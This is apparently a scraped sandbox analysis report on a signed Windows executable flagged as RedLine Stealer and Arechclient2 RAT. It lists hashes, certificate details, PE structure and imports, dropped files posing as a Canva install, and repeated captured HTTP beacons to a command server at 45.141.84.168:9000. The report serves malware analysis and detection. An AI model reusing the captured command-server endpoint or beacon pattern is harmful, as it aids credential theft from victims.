Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................@9...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

Process:	C:\Windows\SysWOW64\more.com
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.80933482022886
Encrypted:	false
SSDEEP:	12288:uvsXZv8km0OHcbGbvzWHz0HnquwMr+g0ssFWylkkoAbtEgIwfNqbYS2VbICKMIUx:ZfPz0HvSg0ssFlSjBcT
MD5:	2B209F07C6251E367835FBF30E7C348E
SHA1:	CD5534D4871AEBA9351941CF548B2E63F492A609
SHA-256:	A499ADF007DF84FC58178A1FD861138C078731760BEA948501259C8E83E19783
SHA-512:	95FE64D09AD91A8DB600969279834E8EF6BBC2371FE3AFDD3D88F351CDDC858A4B247BCBAE1D4351914E0AB720D9372E342E2513C68D64086AFC7C388FC0678D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\jotnemib, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\jotnemib, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\jotnemib, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

Entrypoint:	0x4a83bc
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	40ab50289f7ef5fae60801f88d4541fc

Signature Valid:	true
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	06/06/2024 02:52:51 07/06/2025 02:52:51
Subject Chain	CN="Hebei Qianyuan Biopharmaceutical Co., Ltd.", O="Hebei Qianyuan Biopharmaceutical Co., Ltd.", STREET="South of Xiangtong Village, Nanlou Township, Zhengding County", L=Shijiazhuang, S=Hebei, C=CN, OID.1.3.6.1.4.1.311.60.2.1.1=Shijiazhuang, OID.1.3.6.1.4.1.311.60.2.1.2=Hebei, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=91130123MA09YCKA2U, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	471800388AAA9103A74D65E746957952
Thumbprint SHA-1:	F2EA1DD98D1AF0F9044C24B266475A5C61C6A658
Thumbprint SHA-256:	FF7A3EBC344477D9ADDC06569B913E13D5C9203193B34CCBADBEE3C7D116D846
Serial:	3790CF6A4249C71C54A5D812

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb7000	0x71	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5000	0xfec	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcb000	0x69c1c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5395178	0x29e8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0x10fa8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb9000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb52d4	0x25c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xb6000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa568c	0xa5800	b889d302f6fc48a904de33d8d947ae80	False	0.3620185045317221	data	6.377190161826806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xa7000	0x1b64	0x1c00	588dd0a8ab499300d3701cbd11b017d9	False	0.548828125	data	6.109264411030635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa9000	0x3838	0x3a00	5c0c76e77aef52ebc6702430837ccb6e	False	0.35338092672413796	data	4.95916338709992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xad000	0x7258	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb5000	0xfec	0x1000	627340dff539ef99048969aa4824fb2d	False	0.380615234375	data	5.020404933181373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xb6000	0x1a4	0x200	fd11c1109737963cc6cb7258063abfd6	False	0.34765625	data	2.729290535217263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xb7000	0x71	0x200	7de8ca0c7a61668a728fd3a88dc0942d	False	0.1796875	data	1.305578535725827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xb8000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb9000	0x5d	0x200	d84006640084dc9f74a07c2ff9c7d656	False	0.189453125	data	1.3892750148744617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0x10fa8	0x11000	a85fda2741bd9417695daa5fc5a9d7a5	False	0.5789579503676471	data	6.709466460182023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcb000	0x69c1c	0x69e00	f6d14f45f8145bc951e2271802a63aca	False	0.38513457423258557	data	6.12883713458275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcb708	0xb1b4	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004616196254286
RT_ICON	0xd68bc	0x25228	Device independent bitmap graphic, 192 x 384 x 32, image size 147456, resolution 2835 x 2835 px/m	English	United States	0.24354389102193236
RT_ICON	0xfbae4	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m	English	United States	0.30131314326274694
RT_ICON	0x10c30c	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 2835 x 2835 px/m	English	United States	0.34824994744586923
RT_ICON	0x1157b4	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 2835 x 2835 px/m	English	United States	0.38402255639097743
RT_ICON	0x11bf9c	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 2835 x 2835 px/m	English	United States	0.402634011090573
RT_ICON	0x121424	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m	English	United States	0.43180207841284834
RT_ICON	0x12564c	0x3a48	Device independent bitmap graphic, 60 x 120 x 32, image size 14400, resolution 2835 x 2835 px/m	English	United States	0.45154155495978554
RT_ICON	0x129094	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	English	United States	0.49470954356846475
RT_ICON	0x12b63c	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6400, resolution 2835 x 2835 px/m	English	United States	0.5338757396449704
RT_ICON	0x12d0a4	0x1588	Device independent bitmap graphic, 36 x 72 x 32, image size 5184, resolution 2835 x 2835 px/m	English	United States	0.5469883889695211
RT_ICON	0x12e62c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	English	United States	0.5956848030018762
RT_ICON	0x12f6d4	0xeb0	Device independent bitmap graphic, 30 x 60 x 32, image size 3600, resolution 2835 x 2835 px/m	English	United States	0.6215425531914893
RT_ICON	0x130584	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m	English	United States	0.6754098360655738
RT_ICON	0x130f0c	0x6b8	Device independent bitmap graphic, 20 x 40 x 32, image size 1600, resolution 2835 x 2835 px/m	English	United States	0.7168604651162791
RT_ICON	0x1315c4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	English	United States	0.7819148936170213
RT_STRING	0x131a2c	0x3f8	data			0.3198818897637795
RT_STRING	0x131e24	0x2dc	data			0.36475409836065575
RT_STRING	0x132100	0x430	data			0.40578358208955223
RT_STRING	0x132530	0x44c	data			0.38636363636363635
RT_STRING	0x13297c	0x2d4	data			0.39226519337016574
RT_STRING	0x132c50	0xb8	data			0.6467391304347826
RT_STRING	0x132d08	0x9c	data			0.6410256410256411
RT_STRING	0x132da4	0x374	data			0.4230769230769231
RT_STRING	0x133118	0x398	data			0.3358695652173913
RT_STRING	0x1334b0	0x368	data			0.3795871559633027
RT_STRING	0x133818	0x2a4	data			0.4275147928994083
RT_RCDATA	0x133abc	0x10	data			1.5
RT_RCDATA	0x133acc	0x310	data			0.6173469387755102
RT_RCDATA	0x133ddc	0x2c	data			1.1818181818181819
RT_GROUP_ICON	0x133e08	0xe6	GLS_BINARY_LSB_FIRST	English	United States	0.6739130434782609
RT_VERSION	0x133ef0	0x584	data	English	United States	0.2754957507082153
RT_MANIFEST	0x134474	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 28, 2024 09:52:24.197396040 CET	1.1.1.1	192.168.2.4	0x147	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 28, 2024 09:52:24.197396040 CET	1.1.1.1	192.168.2.4	0x147	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 28, 2024 09:52:26.024123907 CET	1.1.1.1	192.168.2.4	0x1766	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 28, 2024 09:52:26.024123907 CET	1.1.1.1	192.168.2.4	0x1766	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 28, 2024 09:52:41.614048958 CET	1.1.1.1	192.168.2.4	0x4be2	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 28, 2024 09:52:41.614048958 CET	1.1.1.1	192.168.2.4	0x4be2	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 28, 2024 09:53:03.707551956 CET	1.1.1.1	192.168.2.4	0x6ec9	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 28, 2024 09:53:03.707551956 CET	1.1.1.1	192.168.2.4	0x6ec9	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:25.495134115 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:26.920702934 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:26 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:27.212193012 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:28.568861961 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:28 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:28.798757076 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:30.155385017 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:29 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:30.392035961 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:31.843137026 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:31 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:32.081223011 CET	87	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000
Nov 28, 2024 09:53:33.436659098 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:33 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:33.676810026 CET	87	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000
Nov 28, 2024 09:53:35.033323050 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:34 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:35.315681934 CET	87	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000
Nov 28, 2024 09:53:36.625390053 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:36 GMT Connection: close

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9VbeqQbgU4.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Canva\Canva.exe (copy)

C:\Program Files (x86)\Canva\LICENSE.electron.txt (copy)

C:\Program Files (x86)\Canva\LICENSES.chromium.html (copy)

C:\Program Files (x86)\Canva\Uninstall Canva.exe (copy)

C:\Program Files (x86)\Canva\chrome_100_percent.pak (copy)

C:\Program Files (x86)\Canva\chrome_200_percent.pak (copy)

C:\Program Files (x86)\Canva\d3dcompiler_47.dll (copy)

C:\Program Files (x86)\Canva\ffmpeg.dll (copy)

C:\Program Files (x86)\Canva\icudtl.dat (copy)

C:\Program Files (x86)\Canva\is-2470K.tmp

Windows Analysis Report
9VbeqQbgU4.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:36.860204935 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:38.262674093 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:38 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:38.501441002 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:39.905782938 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:39 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:40.149363995 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:41.499802113 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:41 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:41.736778021 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:43.140868902 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:42 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:43.381942987 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:44.784966946 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:44 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:45.016647100 CET	87	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000
Nov 28, 2024 09:53:46.418132067 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:46 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:46.643851042 CET	87	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000
Nov 28, 2024 09:53:47.955285072 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:47 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:48.188484907 CET	87	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000
Nov 28, 2024 09:53:49.501308918 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:49 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:53:49.759010077 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:51.117790937 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:50 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
